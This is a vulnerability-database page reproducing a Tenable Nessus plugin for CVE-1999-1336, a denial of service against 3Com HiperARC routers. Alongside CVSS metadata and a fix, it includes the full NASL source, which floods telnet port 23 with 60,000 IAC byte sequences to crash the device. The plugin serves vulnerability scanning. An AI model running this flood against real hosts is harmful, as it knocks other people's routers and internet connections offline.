Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.HYPERBOMB.NASL
HistoryAug 20, 1999 - 12:00 a.m.

3Com HiPer Access Router Card (HiperARC) IAC Packet Flood DoS

1999-08-2000:00:00
This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
www.tenable.com
27

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.012 Low

EPSS

Percentile

85.1%

JSON

It was possible to reboot the remote host (likely a HyperARC router) by sending it a high volume of IACs.

An attacker may use this flaw to shut down your internet connection.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10108);
 script_version("1.29");
 script_cvs_date("Date: 2018/11/15 20:50:21");

 script_cve_id("CVE-1999-1336");

 script_name(english:"3Com HiPer Access Router Card (HiperARC) IAC Packet Flood DoS");
 script_summary(english:"Crashes the remote host using the 'hyperbomb' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service attack.");
 script_set_attribute(attribute:"description", value:
"It was possible to reboot the remote host (likely a HyperARC router)
by sending it a high volume of IACs.

An attacker may use this flaw to shut down your internet connection.");
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=93492615408725&w=2");
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=93458364903256&w=2");
 script_set_attribute(attribute:"solution", value:
"Add a telnet access list to your Hyperarc router. If the remote system
is not a Hyperarc router, then contact your vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/08/13");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/08/20");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_FLOOD);
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_require_keys("Settings/ParanoidReport");
 script_require_ports(23);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

start_denial();
port = 23;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  data = raw_string(254, 36, 185);
  for(i=0;i<60000;i=i+1)
  {
   send(socket:soc, data:data, length:3);
  }
  close(soc);


 #
 # wait
 #
 sleep(5);

 alive = end_denial();
 if(!alive){
                set_kb_item(name:"Host/dead", value:TRUE);
                security_warning(0);
                }
 }
}

Related

cve 1
nvd 1
cvelist 1
cve
cve
CVE-1999-1336
2002-03-09 05:00:00
nvd
nvd
CVE-1999-1336
1999-08-12 04:00:00
cvelist
cvelist
CVE-1999-1336
2002-03-09 05:00:00

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.012 Low

EPSS

Percentile

85.1%

JSON
Related for HYPERBOMB.NASL
cve1nvd1cvelist1